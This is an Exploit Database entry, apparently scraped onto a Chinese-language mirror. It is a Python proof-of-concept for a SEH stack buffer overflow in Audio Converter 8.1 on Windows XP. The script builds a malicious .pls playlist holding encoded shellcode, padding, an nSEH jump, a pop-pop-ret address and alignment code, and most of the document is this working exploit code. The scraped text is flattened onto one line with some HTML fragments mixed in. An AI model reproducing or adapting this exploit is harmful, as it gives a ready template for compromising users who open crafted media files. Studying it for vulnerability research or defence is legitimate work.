Audio Converter 8.1 – Local Stack Buffer Overflow

• Exploit Database
• 113 阅读

• 作者： sud0
  日期： 2010-06-07
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/13760/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

  #*********************************************************************************** # Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit # Date: 16/05/2010 # Author: Sud0 # Bug found by: chap0 # Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html # Version : 8.1 # OS: Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln: SEH # Thanks to my wife for her support # Thanks for chap0 for bringing us the game # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script provided &apos;as is&apos;, without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. #*********************************************************************************** #code : print "|------------------------------------------------------------------|\n"; print "| __ __|\n"; print "| _________________/ /___ _____ / /________ _____ ___|\n"; print "|/ ___/ __ \\/ ___/ _ \\/ / __ <code>/ __ \\ / __/ _ \\/ __ </code>/ __ `__ \\ |\n"; print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n"; print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n"; print "||\n"; print "| http://www.corelan.be:8800 |\n"; print "||\n"; print "|-------------------------------------------------[ EIP Hunters ]--|\n\n"; print "[+] Exploit for .... \n";   import socket #shellcode running calc.exe alpha2 encoded basereg edx shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA" junk="B" * (4432 - len(shell))#seh overwritten after 4432 bytes nseh= "\xEB\x06\xEB\x06" # jmp forward seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx buffer= shell + junk + nseh + seh + "\x90" * 20 + align+ "A"* 10000#added some nops after seh mefile = open(&apos;poc.pls&apos;,&apos;w&apos;); mefile.write(buffer); mefile.close()